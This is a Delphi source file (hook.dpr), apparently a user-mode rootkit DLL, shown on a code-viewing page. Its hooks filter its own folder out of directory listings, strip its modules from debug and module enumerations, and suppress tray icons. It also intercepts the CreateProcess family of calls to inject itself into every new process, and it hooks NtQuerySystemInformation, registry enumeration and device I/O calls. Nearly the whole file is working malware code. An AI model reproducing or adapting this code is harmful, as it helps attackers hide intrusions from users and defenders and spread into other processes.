📄 hook.dpr
字号:
Offset: dword;
Name: string;
LastFileDirectoryInfo, FileDirectoryInfo: PFILE_DIRECTORY_INFORMATION;
LastFileFullDirectoryInfo, FileFullDirectoryInfo: PFILE_FULL_DIRECTORY_INFORMATION;
LastFileBothDirectoryInfo, FileBothDirectoryInfo: PFILE_BOTH_DIRECTORY_INFORMATION;
LastFileNamesInfo, FileNamesInfo: PFILE_NAMES_INFORMATION;
begin
Result := NtQueryDirectoryFileNextHook(FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, FileInformation, FileInformationLength, FileInformationClass, ReturnSingleEntry, FileName, RestartScan);
if Result <> 0 then Exit;
Offset := 0;
case dword(FileInformationClass) of
1:
begin
FileDirectoryInfo := nil;
repeat
LastFileDirectoryInfo := FileDirectoryInfo;
FileDirectoryInfo := PFILE_DIRECTORY_INFORMATION(pointer(dword(FileInformation) + Offset));
Name := Copy(WideCharToString(FileDirectoryInfo.FileName), 1, FileDirectoryInfo.FileNameLength div 2);
if StrCmp(Name, Root) then
begin
if FileDirectoryInfo.NextEntryOffset = 0 then
begin
if LastFileDirectoryInfo <> nil then LastFileDirectoryInfo.NextEntryOffset := 0
else Result := NTSTATUS($C000000F);
Exit;
end
else
begin
LastFileDirectoryInfo.NextEntryOffset := LastFileDirectoryInfo.NextEntryOffset + FileDirectoryInfo.NextEntryOffset;
end;
end;
Offset := Offset + FileDirectoryInfo.NextEntryOffset;
until FileDirectoryInfo.NextEntryOffset = 0;
end;
2:
begin
FileFullDirectoryInfo := nil;
repeat
LastFileFullDirectoryInfo := FileFullDirectoryInfo;
FileFullDirectoryInfo := PFILE_FULL_DIRECTORY_INFORMATION(pointer(dword(FileInformation) + Offset));
Name := Copy(WideCharToString(FileFullDirectoryInfo.FileName), 1, FileFullDirectoryInfo.FileNameLength div 2);
if StrCmp(Name, Root) then
begin
if FileFullDirectoryInfo.NextEntryOffset = 0 then
begin
if LastFileFullDirectoryInfo <> nil then LastFileFullDirectoryInfo.NextEntryOffset := 0
else Result := NTSTATUS($C000000F);
Exit;
end
else
begin
LastFileFullDirectoryInfo.NextEntryOffset := LastFileFullDirectoryInfo.NextEntryOffset + FileFullDirectoryInfo.NextEntryOffset;
end;
end;
Offset := Offset + FileFullDirectoryInfo.NextEntryOffset;
until FileFullDirectoryInfo.NextEntryOffset = 0;
end;
3:
begin
FileBothDirectoryInfo := nil;
repeat
LastFileBothDirectoryInfo := FileBothDirectoryInfo;
FileBothDirectoryInfo := PFILE_BOTH_DIRECTORY_INFORMATION(pointer(dword(FileInformation) + Offset));
Name := Copy(WideCharToString(FileBothDirectoryInfo.FileName), 1, FileBothDirectoryInfo.FileNameLength div 2);
if StrCmp(Name, Root) then
begin
if FileBothDirectoryInfo.NextEntryOffset = 0 then
begin
if LastFileBothDirectoryInfo <> nil then LastFileBothDirectoryInfo.NextEntryOffset := 0
else Result := NTSTATUS($C000000F);
Exit;
end
else
begin
LastFileBothDirectoryInfo.NextEntryOffset := LastFileBothDirectoryInfo.NextEntryOffset + FileBothDirectoryInfo.NextEntryOffset;
end;
end;
Offset := Offset + FileBothDirectoryInfo.NextEntryOffset;
until FileBothDirectoryInfo.NextEntryOffset = 0;
end;
12:
begin
FileNamesInfo := nil;
repeat
LastFileNamesInfo := FileNamesInfo;
FileNamesInfo := PFILE_NAMES_INFORMATION(pointer(dword(FileInformation) + Offset));
Name := Copy(WideCharToString(FileNamesInfo.FileName), 1, FileNamesInfo.FileNameLength div 2);
if StrCmp(Name, Root) then
begin
if FileNamesInfo.NextEntryOffset = 0 then
begin
if LastFileNamesInfo <> nil then LastFileNamesInfo.NextEntryOffset := 0
else Result := NTSTATUS($C000000F);
Exit;
end
else
begin
LastFileNamesInfo.NextEntryOffset := LastFileNamesInfo.NextEntryOffset + FileNamesInfo.NextEntryOffset;
end;
end;
Offset := Offset + FileNamesInfo.NextEntryOffset;
until FileNamesInfo.NextEntryOffset = 0;
end;
end;
end;
type
PDebugModule = ^TDebugModule;
TDebugModule = packed record
Reserved: array [0..1] of Cardinal;
Base: Cardinal;
Size: Cardinal;
Flags: Cardinal;
Index: Word;
Unknown: Word;
LoadCount: Word;
ModuleNameOffset: Word;
ImageName: array [0..$FF] of Char;
end;
PDebugModuleInformation = ^TDebugModuleInformation;
TDebugModuleInformation = record
Count: Cardinal;
Modules: array [0..0] of TDebugModule;
end;
PDebugBuffer = ^TDebugBuffer;
TDebugBuffer = record
SectionHandle: THandle;
SectionBase: Pointer;
RemoteSectionBase: Pointer;
SectionBaseDelta: Cardinal;
EventPairHandle: THandle;
Unknown: array [0..1] of Cardinal;
RemoteThreadHandle: THandle;
InfoClassMask: Cardinal;
SizeOfInfo: Cardinal;
AllocatedSize: Cardinal;
SectionSize: Cardinal;
ModuleInformation: PDebugModuleInformation;
BackTraceInformation: Pointer;
HeapInformation: Pointer;
LockInformation: Pointer;
Reserved: array [0..7] of Pointer;
end;
function RtlQueryProcessDebugInformationHookProc(hProcess: THandle; lpParam: dword; lpBuffer: pointer): dword; stdcall;
var
QDB: PDebugBuffer;
DllLoop: word;
begin
Result := RtlQueryProcessDebugInformationNextHook(hProcess, lpParam, lpBuffer);
if Result <> 0 then Exit;
if lpBuffer = nil then Exit;
QDB := PDebugBuffer(lpBuffer);
DllLoop := 0;
if IsBadReadPtr(@QDB.ModuleInformation.Count, SizeOf(PDebugModule)) then Exit;
if QDB.ModuleInformation.Count = 0 then Exit;
while DllLoop < QDB.ModuleInformation.Count do
begin
if Pos(LowerCase('\' + Root + '\'), string(QDB.ModuleInformation.Modules[DllLoop].ImageName)) <> 0 then
begin
CopyMemory(@QDB.ModuleInformation.Modules[DllLoop], @QDB.ModuleInformation.Modules[DllLoop + 1], SizeOf(QDB.ModuleInformation.Modules[DllLoop]));
QDB.ModuleInformation.Count := QDB.ModuleInformation.Count - 1;
end
else
begin
Inc(DllLoop);
end;
end;
end;
function EnumProcessModulesHookProc(hProcess: Cardinal; lphModule: pdword; cb: Cardinal; lpcbNeeded: Cardinal): BOOL; stdcall;
var
PID: HMODULE;
PIDLoop: dword;
lpBaseName: array [0..MAX_PATH] of char;
begin
Result := EnumProcessModulesNextHook(hProcess, lphModule, cb, lpcbNeeded);
if Result = False then Exit;
PIDLoop := 0;
while PIDLoop <= pdword(lpcbNeeded)^ div SizeOf(HMODULE) do
begin
PID := pdword(dword(lphModule) + (SizeOf(HMODULE) * PIDLoop))^;
GetModuleFileNameEx(hProcess, PID, @lpBaseName, MAX_PATH);
if Pos(LowerCase('\' + Root + '\'), string(lpBaseName)) <> 0 then
begin
CopyMemory(pdword(dword(lphModule) + (SizeOf(HMODULE) * PIDLoop)), pdword(dword(lphModule) + (SizeOf(HMODULE) * (PIDLoop + 1))), cb - (SizeOf(HMODULE) * (PIDLoop + 1)));
Dec(pdword(lpcbNeeded)^, SizeOf(HMODULE));
Dec(PIDLoop);
end;
Inc(PIDLoop);
end;
end;
function Shell_NotifyIconAHookProc(dwMessage: DWORD; lpData: PNotifyIconDataA): BOOL; stdcall;
begin
Result := True;
end;
function Shell_NotifyIconWHookProc(dwMessage: DWORD; lpData: PNotifyIconDataW): BOOL; stdcall;
begin
Result := True;
end;
procedure MainThread(lpParameter: pointer); stdcall;
var
MainThreadInfo: TMainThreadInfo;
begin
MainThreadInfo := TMainThreadInfo(lpParameter^);
asm
@noret:
push 1000
call MainThreadInfo.pSleep
jmp @noret
end;
end;
function CreateProcessAHookProc(lpApplicationName: PAnsiChar; lpCommandLine: PAnsiChar; lpProcessAttributes, lpThreadAttributes: PSecurityAttributes; bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer; lpCurrentDirectory: PAnsiChar; const lpStartupInfo: TStartupInfo; var lpProcessInformation: TProcessInformation): BOOL; stdcall;
var
MainThreadInfo: TMainThreadInfo;
begin
Result := CreateProcessANextHook(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags or CREATE_SUSPENDED, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
MainThreadInfo.pSleep := GetProcAddress(GetModuleHandle('kernel32'), 'Sleep');
InjectThread(lpProcessInformation.hProcess, @MainThread, @MainThreadInfo, SizeOf(TMainThreadInfo), False);
InjectLibrary(lpProcessInformation.hProcess, GetCurrentModulePath);
ResumeThread(lpProcessInformation.hThread);
end;
function CreateProcessWHookProc(lpApplicationName: PWideChar; lpCommandLine: PWideChar; lpProcessAttributes, lpThreadAttributes: PSecurityAttributes; bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer; lpCurrentDirectory: PWideChar; const lpStartupInfo: TStartupInfo; var lpProcessInformation: TProcessInformation): BOOL; stdcall;
var
MainThreadInfo: TMainThreadInfo;
begin
Result := CreateProcessWNextHook(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags or CREATE_SUSPENDED, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
MainThreadInfo.pSleep := GetProcAddress(GetModuleHandle('kernel32'), 'Sleep');
InjectThread(lpProcessInformation.hProcess, @MainThread, @MainThreadInfo, SizeOf(TMainThreadInfo), False);
InjectLibrary(lpProcessInformation.hProcess, GetCurrentModulePath);
ResumeThread(lpProcessInformation.hThread);
end;
function CreateProcessAsUserAHookProc(hToken: THandle; lpApplicationName: PAnsiChar; lpCommandLine: PAnsiChar; lpProcessAttributes: PSecurityAttributes; lpThreadAttributes: PSecurityAttributes; bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer; lpCurrentDirectory: PAnsiChar; const lpStartupInfo: TStartupInfo; var lpProcessInformation: TProcessInformation): BOOL; stdcall;
var
MainThreadInfo: TMainThreadInfo;
begin
Result := CreateProcessAsUserANextHook(hToken, lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags or CREATE_SUSPENDED, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
MainThreadInfo.pSleep := GetProcAddress(GetModuleHandle('kernel32'), 'Sleep');
InjectThread(lpProcessInformation.hProcess, @MainThread, @MainThreadInfo, SizeOf(TMainThreadInfo), False);
InjectLibrary(lpProcessInformation.hProcess, GetCurrentModulePath);
ResumeThread(lpProcessInformation.hThread);
end;
function CreateProcessAsUserWHookProc(hToken: THandle; lpApplicationName: PWideChar; lpCommandLine: PWideChar; lpProcessAttributes: PSecurityAttributes; lpThreadAttributes: PSecurityAttributes; bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer; lpCurrentDirectory: PWideChar; const lpStartupInfo: TStartupInfo; var lpProcessInformation: TProcessInformation): BOOL; stdcall;
var
MainThreadInfo: TMainThreadInfo;
begin
Result := CreateProcessAsUserWNextHook(hToken, lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags or CREATE_SUSPENDED, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
MainThreadInfo.pSleep := GetProcAddress(GetModuleHandle('kernel32'), 'Sleep');
InjectThread(lpProcessInformation.hProcess, @MainThread, @MainThreadInfo, SizeOf(TMainThreadInfo), False);
InjectLibrary(lpProcessInformation.hProcess, GetCurrentModulePath);
ResumeThread(lpProcessInformation.hThread);
end;
function CreateProcessWithLogonWHookProc(lpUsername, lpDomain, lpPassword: PWideChar; dwLogonFlags: dword; lpApplicationName: PWideChar; lpCommandLine: PWideChar; dwCreationFlags: DWORD; lpEnvironment: Pointer; lpCurrentDirectory: PWideChar; const lpStartupInfo: tSTARTUPINFO; var lpProcessInformation: TProcessInformation): BOOL; stdcall;
var
MainThreadInfo: TMainThreadInfo;
begin
Result := CreateProcessWithLogonWNextHook(lpUsername, lpDomain, lpPassword, dwLogonFlags, lpApplicationName, lpCommandLine, dwCreationFlags or CREATE_SUSPENDED, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
MainThreadInfo.pSleep := GetProcAddress(GetModuleHandle('kernel32'), 'Sleep');
InjectThread(lpProcessInformation.hProcess, @MainThread, @MainThreadInfo, SizeOf(TMainThreadInfo), False);
InjectLibrary(lpProcessInformation.hProcess, GetCurrentModulePath);
ResumeThread(lpProcessInformation.hThread);
end;
procedure EntryPoint(Reason: dword);
begin
if Reason <> DLL_PROCESS_ATTACH then Exit;
Root := GetFolder;
if IsId(GetCurrentProcessId) then Exit;
HookCode(GetProcAddress(GetModuleHandle(Ntdll), 'NtQuerySystemInformation'), @NtQuerySystemInformationHookProc, @NtQuerySystemInformationNextHook);
HookCode(GetProcAddress(GetModuleHandle(Ntdll), 'NtDeviceIoControlFile'), @NtDeviceIoControlFileHookProc, @NtDeviceIoControlFileNextHook);
HookCode(GetProcAddress(GetModuleHandle(Ntdll), 'NtQueryDirectoryFile'), @NtQueryDirectoryFileHookProc, @NtQueryDirectoryFileNextHook);
HookCode(GetProcAddress(GetModuleHandle(Ntdll), 'RtlQueryProcessDebugInformation'), @RtlQueryProcessDebugInformationHookProc, @RtlQueryProcessDebugInformationNextHook);
HookCode(GetProcAddress(GetModuleHandle(Kernel), 'CreateProcessA'), @CreateProcessAHookProc, @CreateProcessANextHook);
HookCode(GetProcAddress(GetModuleHandle(Kernel), 'CreateProcessW'), @CreateProcessWHookProc, @CreateProcessWNextHook);
HookCode(GetProcAddress(GetModuleHandle(Advapi), 'CreateProcessAsUserA'), @CreateProcessAsUserAHookProc, @CreateProcessAsUserANextHook);
HookCode(GetProcAddress(GetModuleHandle(Advapi), 'CreateProcessAsUserW'), @CreateProcessAsUserWHookProc, @CreateProcessAsUserWNextHook);
HookCode(GetProcAddress(GetModuleHandle(Advapi), 'CreateProcessWithLogonW'), @CreateProcessWithLogonWHookProc, @CreateProcessWithLogonWNextHook);
if not IsExplorer(GetCurrentProcessId) then HookCode(GetProcAddress(GetModuleHandle(Ntdll), 'NtEnumerateValueKey'), @NtEnumerateValueKeyHookProc, @NtEnumerateValueKeyNextHook);
HookCode(GetProcAddress(LoadLibrary('psapi'), 'EnumProcessModules'), @EnumProcessModulesHookProc, @EnumProcessModulesNextHook);
SetPrivilege;
end;
begin
DLLProc := @EntryPoint;
EntryPoint(DLL_PROCESS_ATTACH);
ExitThread(0);
end.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -